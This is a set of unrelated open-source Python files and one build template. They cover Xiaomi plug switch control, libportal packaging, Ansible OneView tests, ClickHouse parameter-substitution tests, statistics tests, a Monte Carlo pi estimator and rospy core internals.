super().__init__(name, plug, entry, unique_id)
self._channel_usb = channel_usb
if self._model == MODEL_PLUG_V3:
self._device_features = FEATURE_FLAGS_PLUG_V3
self._state_attrs[ATTR_WIFI_LED] = None
if self._channel_usb is False:
self._state_attrs[ATTR_LOAD_POWER] = None
async def async_turn_on(self, **kwargs):
"""Turn a channel on."""
if self._channel_usb:
result = await self._try_command(
"Turning the plug on failed", self._device.usb_on
)
else:
result = await self._try_command(
"Turning the plug on failed", self._device.on
)
if result:
self._state = True
self._skip_update = True
async def async_turn_off(self, **kwargs):
"""Turn a channel off."""
if self._channel_usb:
result = await self._try_command(
"Turning the plug off failed", self._device.usb_off
)
else:
result = await self._try_command(
"Turning the plug off failed", self._device.off
)
if result:
self._state = False
self._skip_update = True
async def async_update(self):
"""Fetch state from the device."""
# On state change the device doesn't provide the new state immediately.
if self._skip_update:
self._skip_update = False
return
try:
state = await self.hass.async_add_executor_job(self._device.status)
_LOGGER.debug("Got new state: %s", state)
self._available = True
if self._channel_usb:
self._state = state.usb_power
else:
self._state = state.is_on
self._state_attrs[ATTR_TEMPERATURE] = state.temperature
if state.wifi_led:
self._state_attrs[ATTR_WIFI_LED] = state.wifi_led
if self._channel_usb is False and state.load_power:
self._state_attrs[ATTR_LOAD_POWER] = state.load_power
except DeviceException as ex:
if self._available:
self._available = False
_LOGGER.error("Got exception while fetching the state: %s", ex)
class XiaomiAirConditioningCompanionSwitch(XiaomiPlugGenericSwitch):
"""Representation of a Xiaomi AirConditioning Companion."""
def __init__(self, name, plug, model, unique_id):
"""Initialize the acpartner switch."""
super().__init__(name, plug, model, unique_id)
self._state_attrs.update({ATTR_TEMPERATURE: None, ATTR_LOAD_POWER: None})
async def async_turn_on(self, **kwargs):
"""Turn the socket on."""
result = await self._try_command(
"Turning the socket on failed", self._device.socket_on
)
if result:
self._state = True
self._skip_update = True
async def async_turn_off(self, **kwargs):
"""Turn the socket off."""
result = await self._try_command(
"Turning the socket off failed", self._device.socket_off
)
if result:
self._state = False
self._skip_update = True
async def async_update(self):
"""Fetch state from the device."""
# On state change the device doesn't provide the new state immediately.
if self._skip_update:
self._skip_update = False
return
try:
state = await self.hass.async_add_executor_job(self._device.status)
_LOGGER.debug("Got new state: %s", state)
self._available = True
self._state = state.power_socket == "on"
self._state_attrs[ATTR_LOAD_POWER] = state.load_power
except DeviceException as ex:
if self._available:
self._available = False
_LOGGER.error("Got exception while fetching the state: %s", ex)
|
the-stack_106_12951
|
pkgname = "libportal"
pkgver = "0.6"
pkgrel = 0
build_style = "meson"
configure_args = ["-Ddocs=false", "-Dbackends=gtk3"]
hostmakedepends = [
"meson", "pkgconf", "glib-devel", "gobject-introspection", "vala"
]
makedepends = ["libglib-devel", "gtk+3-devel"]
pkgdesc = "Flatpak portal library"
maintainer = "q66 <[email protected]>"
license = "LGPL-3.0-only"
url = "https://github.com/flatpak/libportal"
source = f"{url}/releases/download/{pkgver}/{pkgname}-{pkgver}.tar.xz"
sha256 = "88a12c3ba71bc31acff7238c280de697d609cebc50830c3766776ec35abc6566"
@subpackage("libportal-gtk3")
def _gtk3(self):
self.pkgdesc = f"{pkgdesc} (Gtk+3 backend)"
return ["usr/lib/girepository-1.0/XdpGtk3*", "usr/lib/libportal-gtk3.so.*"]
@subpackage("libportal-devel")
def _devel(self):
return self.default_devel()
|
the-stack_106_12952
|
# -*- coding: utf-8 -*-
#
# Copyright (2016-2017) Hewlett Packard Enterprise Development LP
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat import unittest
from .oneview_module_loader import FcNetworkModule
from .hpe_test_utils import OneViewBaseTestCase
FAKE_MSG_ERROR = 'Fake message error'
DEFAULT_FC_NETWORK_TEMPLATE = dict(
name='New FC Network 2',
autoLoginRedistribution=True,
fabricType='FabricAttach'
)
PARAMS_FOR_PRESENT = dict(
config='config.json',
state='present',
data=dict(name=DEFAULT_FC_NETWORK_TEMPLATE['name'])
)
PARAMS_WITH_CHANGES = dict(
config='config.json',
state='present',
data=dict(name=DEFAULT_FC_NETWORK_TEMPLATE['name'],
newName="New Name",
fabricType='DirectAttach')
)
PARAMS_FOR_ABSENT = dict(
config='config.json',
state='absent',
data=dict(name=DEFAULT_FC_NETWORK_TEMPLATE['name'])
)
class FcNetworkModuleSpec(unittest.TestCase,
OneViewBaseTestCase):
"""
OneViewBaseTestCase provides the mocks used in this test case
"""
def setUp(self):
self.configure_mocks(self, FcNetworkModule)
self.resource = self.mock_ov_client.fc_networks
def test_should_create_new_fc_network(self):
self.resource.get_by.return_value = []
self.resource.create.return_value = DEFAULT_FC_NETWORK_TEMPLATE
self.mock_ansible_module.params = PARAMS_FOR_PRESENT
FcNetworkModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=FcNetworkModule.MSG_CREATED,
ansible_facts=dict(fc_network=DEFAULT_FC_NETWORK_TEMPLATE)
)
def test_should_not_update_when_data_is_equals(self):
self.resource.get_by.return_value = [DEFAULT_FC_NETWORK_TEMPLATE]
self.mock_ansible_module.params = PARAMS_FOR_PRESENT
FcNetworkModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=FcNetworkModule.MSG_ALREADY_PRESENT,
ansible_facts=dict(fc_network=DEFAULT_FC_NETWORK_TEMPLATE)
)
def test_update_when_data_has_modified_attributes(self):
data_merged = DEFAULT_FC_NETWORK_TEMPLATE.copy()
data_merged['fabricType'] = 'DirectAttach'
self.resource.get_by.return_value = [DEFAULT_FC_NETWORK_TEMPLATE]
self.resource.update.return_value = data_merged
self.mock_ansible_module.params = PARAMS_WITH_CHANGES
FcNetworkModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=FcNetworkModule.MSG_UPDATED,
ansible_facts=dict(fc_network=data_merged)
)
def test_should_remove_fc_network(self):
self.resource.get_by.return_value = [DEFAULT_FC_NETWORK_TEMPLATE]
self.mock_ansible_module.params = PARAMS_FOR_ABSENT
FcNetworkModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=FcNetworkModule.MSG_DELETED
)
def test_should_do_nothing_when_fc_network_not_exist(self):
self.resource.get_by.return_value = []
self.mock_ansible_module.params = PARAMS_FOR_ABSENT
FcNetworkModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=FcNetworkModule.MSG_ALREADY_ABSENT
)
def test_update_scopes_when_different(self):
params_to_scope = PARAMS_FOR_PRESENT.copy()
params_to_scope['data']['scopeUris'] = ['test']
self.mock_ansible_module.params = params_to_scope
resource_data = DEFAULT_FC_NETWORK_TEMPLATE.copy()
resource_data['scopeUris'] = ['fake']
resource_data['uri'] = 'rest/fc/fake'
self.resource.get_by.return_value = [resource_data]
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
self.resource.patch.return_value = patch_return
FcNetworkModule().run()
self.resource.patch.assert_called_once_with('rest/fc/fake',
operation='replace',
path='/scopeUris',
value=['test'])
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(fc_network=patch_return),
msg=FcNetworkModule.MSG_UPDATED
)
def test_should_do_nothing_when_scopes_are_the_same(self):
params_to_scope = PARAMS_FOR_PRESENT.copy()
params_to_scope['data']['scopeUris'] = ['test']
self.mock_ansible_module.params = params_to_scope
resource_data = DEFAULT_FC_NETWORK_TEMPLATE.copy()
resource_data['scopeUris'] = ['test']
self.resource.get_by.return_value = [resource_data]
FcNetworkModule().run()
self.resource.patch.not_been_called()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(fc_network=resource_data),
msg=FcNetworkModule.MSG_ALREADY_PRESENT
)
if __name__ == '__main__':
unittest.main()
|
the-stack_106_12954
|
"""Unit tests for working with ephemeris files
Authors
-------
- Bryan Hilbert
Use
---
Ensure you have pytest installed. Then, simply run pytest in any
parent directory of mirage/tests/:
>>> pytest
"""
import datetime
import numpy as np
import os
import pkg_resources
from mirage.seed_image import ephemeris_tools
package_path = pkg_resources.resource_filename('mirage', '')
data_dir = os.path.join( os.path.dirname(__file__), 'test_data/ephemeris/')
CONFIG_DIR = os.path.join(package_path, 'config')
def test_create_interpol_function():
"""Create an interpolation function from an ephemeris table
"""
ephemeris_file = os.path.join(data_dir, 'horizons_results.txt')
ephem_table = ephemeris_tools.read_ephemeris_file(ephemeris_file)
ra_function, dec_function = ephemeris_tools.create_interpol_function(ephem_table)
check_time = datetime.datetime(2020, 10, 3)
check_time_calendar = ephemeris_tools.to_timestamp(check_time)
ra_interp = ra_function([check_time_calendar])
dec_interp = dec_function([check_time_calendar])
assert np.isclose(ra_interp[0], 23.74433333333333, atol=1e-9)
assert np.isclose(dec_interp[0], 6.01483333, atol=1e-9)
def test_read_ephemeris_file():
"""Read in an ephemeris and return interpolation funcations. Development
was based on an ephemeris file from Hoirzons.
"""
ephemeris_file = os.path.join(data_dir, 'horizons_results.txt')
ephem = ephemeris_tools.read_ephemeris_file(ephemeris_file)
check_time = datetime.datetime(2020, 10, 1)
match = ephem['Time'] == check_time
assert np.isclose(ephem[match]['RA'].data[0], 24.299791666666664, atol=1e-9)
assert np.isclose(ephem[match]['Dec'].data[0], 6.131916666666666, atol=1e-9)
|
the-stack_106_12955
|
# coding=utf-8
from __future__ import unicode_literals
from datetime import date, datetime
from decimal import Decimal
from uuid import UUID
from enum import IntEnum, Enum
from tests.testcase import BaseTestCase
class ParametersSubstitutionTestCase(BaseTestCase):
single_tpl = 'SELECT %(x)s'
double_tpl = 'SELECT %(x)s, %(y)s'
def assert_subst(self, tpl, params, sql):
self.assertEqual(self.client.substitute_params(tpl, params), sql)
def test_int(self):
params = {'x': 123}
self.assert_subst(self.single_tpl, params, 'SELECT 123')
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [(123, )])
def test_null(self):
params = {'x': None}
self.assert_subst(self.single_tpl, params, 'SELECT NULL')
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [(None, )])
def test_date(self):
d = date(2017, 10, 16)
params = {'x': d}
self.assert_subst(self.single_tpl, params, "SELECT '2017-10-16'")
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [('2017-10-16', )])
tpl = 'SELECT CAST(%(x)s AS Date)'
self.assert_subst(tpl, params, "SELECT CAST('2017-10-16' AS Date)")
rv = self.client.execute(tpl, params)
self.assertEqual(rv, [(d, )])
def test_datetime(self):
dt = datetime(2017, 10, 16, 0, 18, 50)
params = {'x': dt}
self.assert_subst(self.single_tpl, params,
"SELECT '2017-10-16 00:18:50'")
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [('2017-10-16 00:18:50', )])
tpl = 'SELECT CAST(%(x)s AS DateTime)'
self.assert_subst(tpl, params,
"SELECT CAST('2017-10-16 00:18:50' AS DateTime)")
rv = self.client.execute(tpl, params)
self.assertEqual(rv, [(dt, )])
def test_string(self):
params = {'x': 'test\t\n\x16', 'y': 'тест\t\n\x16'}
self.assert_subst(self.double_tpl, params,
"SELECT 'test\\t\\n\x16', 'тест\\t\\n\x16'")
rv = self.client.execute(self.double_tpl, params)
self.assertEqual(rv, [('test\t\n\x16', 'тест\t\n\x16')])
params = {'x': "'"}
self.assert_subst(self.single_tpl, params, "SELECT '\\''")
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [("'", )])
params = {'x': "\\"}
self.assert_subst(self.single_tpl, params, "SELECT '\\\\'")
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [("\\", )])
def test_array(self):
params = {'x': [1, None, 2]}
self.assert_subst(self.single_tpl, params, 'SELECT [1, NULL, 2]')
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [([1, None, 2], )])
params = {'x': [[1, 2, 3], [4, 5], [6, 7]]}
self.assert_subst(self.single_tpl, params,
'SELECT [[1, 2, 3], [4, 5], [6, 7]]')
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [([[1, 2, 3], [4, 5], [6, 7]], )])
def test_tuple(self):
params = {'x': (1, None, 2)}
self.assert_subst('SELECT * FROM test WHERE a IN %(x)s', params,
'SELECT * FROM test WHERE a IN (1, NULL, 2)')
with self.create_table('a Int32'):
self.client.execute('INSERT INTO test (a) VALUES', [(1, )])
self.client.execute('INSERT INTO test (a) VALUES', [(2, )])
query = 'SELECT * FROM test WHERE a IN (1)'
inserted = self.client.execute(query, columnar=True)
self.assertEqual(inserted, [(1,)])
def test_enum(self):
class A(IntEnum):
hello = -1
world = 2
params = {'x': A.hello, 'y': A.world}
self.assert_subst(self.double_tpl, params, 'SELECT -1, 2')
rv = self.client.execute(self.double_tpl, params)
self.assertEqual(rv, [(-1, 2)])
class A(Enum):
hello = 'hello'
world = 'world'
params = {'x': A.hello, 'y': A.world}
self.assert_subst(self.double_tpl, params, "SELECT 'hello', 'world'")
rv = self.client.execute(self.double_tpl, params)
self.assertEqual(rv, [('hello', 'world')])
def test_float(self):
params = {'x': 1e-12, 'y': 123.45}
self.assert_subst(self.double_tpl, params, 'SELECT 1e-12, 123.45')
rv = self.client.execute(self.double_tpl, params)
self.assertEqual(rv, [(params['x'], params['y'])])
def test_decimal(self):
params = {'x': Decimal('1e-2'), 'y': Decimal('123.45')}
self.assert_subst(self.double_tpl, params, 'SELECT 0.01, 123.45')
rv = self.client.execute(self.double_tpl, params)
self.assertEqual(rv, [(0.01, 123.45)])
def test_uuid(self):
params = {'x': UUID('c0fcbba9-0752-44ed-a5d6-4dfb4342b89d')}
self.assert_subst(self.single_tpl, params,
"SELECT 'c0fcbba9-0752-44ed-a5d6-4dfb4342b89d'")
rv = self.client.execute(self.single_tpl, params)
self.assertEqual(rv, [('c0fcbba9-0752-44ed-a5d6-4dfb4342b89d', )])
def test_substitute_object(self):
params = object()
with self.assertRaises(ValueError) as e:
self.client.substitute_params(self.single_tpl, params)
self.assertEqual(e.exception.args[0],
'Parameters are expected in dict form')
|
the-stack_106_12959
|
import numpy as np
from numpy.testing import assert_almost_equal
from scipy import stats
from statsmodels.stats._lilliefors import lilliefors
class TestLilliefors(object):
def test_normal(self):
np.random.seed(3975)
x_n = stats.norm.rvs(size=500)
# R function call:
# require(nortest)
# lillie.test(x_n)
d_ks_norm, p_norm = lilliefors(x_n, dist='norm')
# shift normal distribution > 0 to exactly mirror R `KScorrect` test
# R `KScorrect` requires all values tested for exponential
# distribution to be > 0
# R function call:
# require(KScorrect)
# LcKS(x_n+abs(min(x_n))+0.001, 'pexp')
d_ks_exp, p_exp = lilliefors(x_n+np.abs(x_n.min()) + 0.001, dist='exp')
# assert normal
assert_almost_equal(d_ks_norm, 0.025957, decimal=3)
assert_almost_equal(p_norm, 0.2000, decimal=3)
# assert exp
assert_almost_equal(d_ks_exp, 0.3436007, decimal=3)
assert_almost_equal(p_exp, 0.01, decimal=3)
def test_expon(self):
np.random.seed(3975)
x_e = stats.expon.rvs(size=500)
# R function call:
# require(nortest)
# lillie.test(x_n)
d_ks_norm, p_norm = lilliefors(x_e, dist='norm')
# R function call:
# require(KScorrect)
# LcKS(x_e, 'pexp')
d_ks_exp, p_exp = lilliefors(x_e, dist='exp')
# assert normal
assert_almost_equal(d_ks_norm, 0.15581, decimal=3)
assert_almost_equal(p_norm, 2.2e-16, decimal=3)
# assert exp
assert_almost_equal(d_ks_exp, 0.02763748, decimal=3)
assert_almost_equal(p_exp, 0.200, decimal=3)
def test_pval_bounds(self):
x = np.arange(1, 10)
d_ks_n, p_n = lilliefors(x, dist='norm')
d_ks_e, p_e = lilliefors(x, dist='exp')
assert_almost_equal(p_n, 0.200, decimal=7)
assert_almost_equal(p_e, 0.200, decimal=7)
|
the-stack_106_12961
|
# -*- coding: utf-8 -*-
# Imports all the necessary libraries
"""This application approximates the PI value based on a Monte Carlo Simulation.
It asks for input from the user regarding on number of darts thrown."""
import math
import random
import numpy as np
import matplotlib.pyplot as plt
def gen_circle(radius=1, center_x=0, center_y=0, res=50):
"""Returns the points of coordinates [x,y] which lie on the circle
with the radius radius and with the center specified at center = [x,y],
with the resolution res"""
xcord = [center_x + radius * math.cos(tht) for \
tht in np.linspace(0, 2 * math.pi, res)]
ycord = [center_y + radius * math.sin(tht) for \
tht in np.linspace(0, 2 * math.pi, res)]
return [xcord, ycord]
def gen_square(center_x=0, center_y=0, edge=2):
"""Returns the vertices of a square in [x,y] coordinates, which is centered
at the center=[x,y] and with the edge length equal to edge"""
vertices_x = [center_x + edge/2, center_x - \
edge/2, center_x - edge/2, center_x + edge/2]
vertices_y = [center_y + edge/2, center_y + \
edge/2, center_y - edge/2, center_y - edge/2]
vertices = [vertices_x, vertices_y]
return vertices
PLAY = True
APPROX_PI_LIST = list()
NUM_DARTS_LIST = list()
while PLAY:
#Insert the number of darts to be thrown
NUM_DARTS = int( \
input('Please insert the number of darts that you want to throw\n'))
NUM_DARTS_LIST.append(NUM_DARTS)
CIRC_DARTS = {'x':list(), 'y':list()}
SQUARE_DARTS = {'x':list(), 'y':list()}
CIRC_HITS = 0
SQUARE_HITS = 0
for dart in range(NUM_DARTS):
x_dart = random.random() * 2 - 1
y_dart = random.random() * 2 - 1
if(x_dart**2 + y_dart**2)**(1/2) > 1:
SQUARE_HITS += 1
SQUARE_DARTS['x'].append(x_dart)
SQUARE_DARTS['y'].append(y_dart)
elif(x_dart**2 + y_dart**2)**(1/2) <= 1:
CIRC_HITS += 1
CIRC_DARTS['x'].append(x_dart)
CIRC_DARTS['y'].append(y_dart)
else:
pass
APPROX_PI = 4 * CIRC_HITS/NUM_DARTS #THE APPROXIMATED VALUE OF PI
APPROX_PI_LIST.append(APPROX_PI)
#Plots the darts thrown in a new figure
plt.figure(figsize=(10, 10))
#Plots the square
plt.fill(gen_square()[0], gen_square()[1], fill=False)
#Plots the circle
plt.plot(gen_circle()[0], gen_circle()[1], 'g-')
#Plots the darts which landed on the darts board
plt.plot(CIRC_DARTS['x'], CIRC_DARTS['y'], 'go')
#Plots the darts which landed outside the darts board and inside the square
plt.plot(SQUARE_DARTS['x'], SQUARE_DARTS['y'], 'ro')
#Sets a title to the plot
plt.title('Approximated Pi value: {:6.4f} ==> Darts thrown: {:d}'.format( \
APPROX_PI, NUM_DARTS), {'fontsize':20})
#Turning off hte tick labels for the plots
plt.xticks([])
plt.yticks([])
print("\nYour darts Monte Carlo method approximative value of PI is:",
" {}\n\nThat's {} off from the actual value of PI\n".format(\
APPROX_PI, abs(math.pi - APPROX_PI)))
print('\nCircle hit {} times and square hit {} times'.format(\
CIRC_HITS, SQUARE_HITS))
QUESTION_STRING = 'Do you want to trow darts again Y/N?. \
To see all the plots press N\n'
CONTINUE_PLAY = input(QUESTION_STRING)
if CONTINUE_PLAY == 'Y':
PLAY = True
elif CONTINUE_PLAY == 'N':
PLAY = False
print('\nThank you for playing the game,',
' have a look at all the plots generated\n')
print('\nThe previous results are:\n')
for piVal, dart in zip(APPROX_PI_LIST, NUM_DARTS_LIST):
print(f'Approximated Pi value: {piVal:4} ',
f'==> Darts thrown: {dart:4}')
|
the-stack_106_12964
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Revision $Id$
"""rospy internal core implementation library"""
import atexit
import logging
import os
import signal
import sys
import threading
import time
import traceback
import types
try:
import urllib.parse as urlparse #Python 3.x
except ImportError:
import urlparse
try:
import xmlrpc.client as xmlrpcclient #Python 3.x
except ImportError:
import xmlrpclib as xmlrpcclient #Python 2.x
import rospkg
import rosgraph.roslogging
import rospy.exceptions
import rospy.rostime
from rospy.names import *
from rospy.impl.validators import ParameterInvalid
from rosgraph_msgs.msg import Log
_logger = logging.getLogger("rospy.core")
# number of seconds to wait to join on threads. network issue can
# cause joins to be not terminate gracefully, and it's better to
# teardown dirty than to hang
_TIMEOUT_SHUTDOWN_JOIN = 5.
import warnings
def deprecated(func):
"""This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emmitted
when the function is used."""
def newFunc(*args, **kwargs):
warnings.warn("Call to deprecated function %s." % func.__name__,
category=DeprecationWarning, stacklevel=2)
return func(*args, **kwargs)
newFunc.__name__ = func.__name__
newFunc.__doc__ = func.__doc__
newFunc.__dict__.update(func.__dict__)
return newFunc
#########################################################
# ROSRPC
ROSRPC = "rosrpc://"
def parse_rosrpc_uri(uri):
"""
utility function for parsing ROS-RPC URIs
@param uri: ROSRPC URI
@type uri: str
@return: address, port
@rtype: (str, int)
@raise ParameterInvalid: if uri is not a valid ROSRPC URI
"""
if uri.startswith(ROSRPC):
dest_addr = uri[len(ROSRPC):]
else:
raise ParameterInvalid("Invalid protocol for ROS service URL: %s"%uri)
try:
if '/' in dest_addr:
dest_addr = dest_addr[:dest_addr.find('/')]
dest_addr, dest_port = dest_addr.split(':')
dest_port = int(dest_port)
except:
raise ParameterInvalid("ROS service URL is invalid: %s"%uri)
return dest_addr, dest_port
#########################################################
# rospy logger
_rospy_logger = logging.getLogger("rospy.internal")
# we keep a separate, non-rosout log file to contain stack traces and
# other sorts of information that scare users but are essential for
# debugging
def rospydebug(msg, *args):
"""Internal rospy client library debug logging"""
_rospy_logger.debug(msg, *args)
def rospyinfo(msg, *args):
"""Internal rospy client library debug logging"""
_rospy_logger.info(msg, *args)
def rospyerr(msg, *args):
"""Internal rospy client library error logging"""
_rospy_logger.error(msg, *args)
def rospywarn(msg, *args):
"""Internal rospy client library warn logging"""
_rospy_logger.warn(msg, *args)
logdebug = logging.getLogger('rosout').debug
logwarn = logging.getLogger('rosout').warning
loginfo = logging.getLogger('rosout').info
logout = loginfo # alias deprecated name
logerr = logging.getLogger('rosout').error
logerror = logerr # alias logerr
logfatal = logging.getLogger('rosout').critical
#########################################################
# CONSTANTS
MASTER_NAME = "master" #master is a reserved node name for the central master
import warnings
def deprecated(func):
"""This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emmitted
when the function is used."""
def newFunc(*args, **kwargs):
warnings.warn("Call to deprecated function %s." % func.__name__,
category=DeprecationWarning, stacklevel=2)
return func(*args, **kwargs)
newFunc.__name__ = func.__name__
newFunc.__doc__ = func.__doc__
newFunc.__dict__.update(func.__dict__)
return newFunc
@deprecated
def get_ros_root(required=False, env=None):
"""
Get the value of ROS_ROOT.
@param env: override environment dictionary
@type env: dict
@param required: if True, fails with ROSException
@return: Value of ROS_ROOT environment
@rtype: str
@raise ROSException: if require is True and ROS_ROOT is not set
"""
if env is None:
env = os.environ
ros_root = rospkg.get_ros_root(env)
if required and not ros_root:
raise rospy.exceptions.ROSException('%s is not set'%rospkg.environment.ROS_ROOT)
return ros_root
#########################################################
# API
_uri = None
def get_node_uri():
"""
Get this Node's URI.
@return: this Node's XMLRPC URI
@rtype: str
"""
return _uri
def set_node_uri(uri):
"""set the URI of the local node.
This is an internal API method, it does not actually affect the XMLRPC URI of the Node."""
global _uri
_uri = uri
#########################################################
# Logging
_log_filename = None
def configure_logging(node_name, level=logging.INFO):
"""
Setup filesystem logging for this node
@param node_name: Node's name
@type node_name str
@param level: (optional) Python logging level (INFO, DEBUG, etc...). (Default: logging.INFO)
@type level: int
"""
global _log_filename
# #988 __log command-line remapping argument
mappings = get_mappings()
if '__log' in get_mappings():
logfilename_remap = mappings['__log']
filename = os.path.abspath(logfilename_remap)
else:
# fix filesystem-unsafe chars
filename = node_name.replace('/', '_') + '.log'
if filename[0] == '_':
filename = filename[1:]
if not filename:
raise rospy.exceptions.ROSException('invalid configure_logging parameter: %s'%node_name)
_log_filename = rosgraph.roslogging.configure_logging('rospy', level, filename=filename)
class NullHandler(logging.Handler):
def emit(self, record):
pass
# keep logging happy until we have the node name to configure with
logging.getLogger('rospy').addHandler(NullHandler())
#########################################################
# Init/Shutdown/Exit API and Handlers
_client_ready = False
def is_initialized():
"""
Get the initialization state of the local node. If True, node has
been configured.
@return: True if local node initialized
@rtype: bool
"""
return _client_ready
def set_initialized(initialized):
"""
set the initialization state of the local node
@param initialized: True if node initialized
@type initialized: bool
"""
global _client_ready
_client_ready = initialized
_shutdown_lock = threading.RLock()
# _shutdown_flag flags that rospy is in shutdown mode, in_shutdown
# flags that the shutdown routine has started. These are separate
# because 'pre-shutdown' hooks require rospy to be in a non-shutdown
# mode. These hooks are executed during the shutdown routine.
_shutdown_flag = False
_in_shutdown = False
# various hooks to call on shutdown. shutdown hooks are called in the
# shutdown state, preshutdown are called just before entering shutdown
# state, and client shutdown is called before both of these.
_shutdown_hooks = []
_preshutdown_hooks = []
_client_shutdown_hooks = []
# threads that must be joined on shutdown
_shutdown_threads = []
_signalChain = {}
def is_shutdown():
"""
@return: True if shutdown flag has been set
@rtype: bool
"""
return _shutdown_flag
def is_shutdown_requested():
"""
is_shutdown_requested is a state that occurs just before
is_shutdown. It is initiated when a shutdown requested is
received and continues until client shutdown handlers have been
called. After client shutdown handlers have been serviced, the
is_shutdown state becomes true.
@return: True if shutdown has been requested (but possibly not yet initiated)
@rtype: bool
"""
return _in_shutdown
def _add_shutdown_hook(h, hooks):
"""
shared implementation of add_shutdown_hook and add_preshutdown_hook
"""
if type(h) not in [types.FunctionType, types.MethodType]:
raise TypeError("shutdown hook [%s] must be a function: %s"%(h, type(h)))
if _shutdown_flag:
_logger.warn("add_shutdown_hook called after shutdown")
h("already shutdown")
return
with _shutdown_lock:
if hooks is None:
# race condition check, don't log as we are deep into shutdown
return
hooks.append(h)
def _add_shutdown_thread(t):
"""
Register thread that must be joined() on shutdown
"""
if _shutdown_flag:
#TODO
return
with _shutdown_lock:
if _shutdown_threads is None:
# race condition check, don't log as we are deep into shutdown
return
# in order to prevent memory leaks, reap dead threads. The
# last thread may not get reaped until shutdown, but this is
# relatively minor
for other in _shutdown_threads[:]:
if not other.isAlive():
_shutdown_threads.remove(other)
_shutdown_threads.append(t)
def add_client_shutdown_hook(h):
"""
Add client method to invoke when system shuts down. Unlike
L{add_shutdown_hook} and L{add_preshutdown_hooks}, these methods
will be called before any rospy internal shutdown code.
@param h: function that takes in a single string argument (shutdown reason)
@type h: fn(str)
"""
_add_shutdown_hook(h, _client_shutdown_hooks)
def add_preshutdown_hook(h):
"""
Add method to invoke when system shuts down. Unlike
L{add_shutdown_hook}, these methods will be called before any
other shutdown hooks.
@param h: function that takes in a single string argument (shutdown reason)
@type h: fn(str)
"""
_add_shutdown_hook(h, _preshutdown_hooks)
def add_shutdown_hook(h):
"""
Add method to invoke when system shuts down.
Shutdown hooks are called in the order that they are
registered. This is an internal API method that is used to
cleanup. See the client X{on_shutdown()} method if you wish to
register client hooks.
@param h: function that takes in a single string argument (shutdown reason)
@type h: fn(str)
"""
_add_shutdown_hook(h, _shutdown_hooks)
def signal_shutdown(reason):
"""
Initiates shutdown process by signaling objects waiting on _shutdown_lock.
Shutdown and pre-shutdown hooks are invoked.
@param reason: human-readable shutdown reason, if applicable
@type reason: str
"""
global _shutdown_flag, _in_shutdown, _shutdown_lock, _shutdown_hooks
_logger.info("signal_shutdown [%s]"%reason)
if _shutdown_flag or _in_shutdown:
return
with _shutdown_lock:
if _shutdown_flag or _in_shutdown:
return
_in_shutdown = True
# make copy just in case client re-invokes shutdown
for h in _client_shutdown_hooks:
try:
# client shutdown hooks do not accept a reason arg
h()
except:
traceback.print_exc()
del _client_shutdown_hooks[:]
for h in _preshutdown_hooks:
try:
h(reason)
except:
traceback.print_exc()
del _preshutdown_hooks[:]
# now that pre-shutdown hooks have been called, raise shutdown
# flag. This allows preshutdown hooks to still publish and use
# service calls properly
_shutdown_flag = True
for h in _shutdown_hooks:
try:
h(reason)
except Exception as e:
sys.stderr.write("signal_shutdown hook error[%s]\n"%e)
del _shutdown_hooks[:]
threads = _shutdown_threads[:]
for t in threads:
if t.isAlive():
t.join(_TIMEOUT_SHUTDOWN_JOIN)
del _shutdown_threads[:]
try:
rospy.rostime.wallsleep(0.1) #hack for now until we get rid of all the extra threads
except KeyboardInterrupt: pass
def _ros_signal(sig, stackframe):
signal_shutdown("signal-"+str(sig))
prev_handler = _signalChain.get(sig, None)
if prev_handler is not None and not type(prev_handler) == int:
try:
prev_handler(sig, stackframe)
except KeyboardInterrupt:
pass #filter out generic keyboard interrupt handler
def _ros_atexit():
signal_shutdown('atexit')
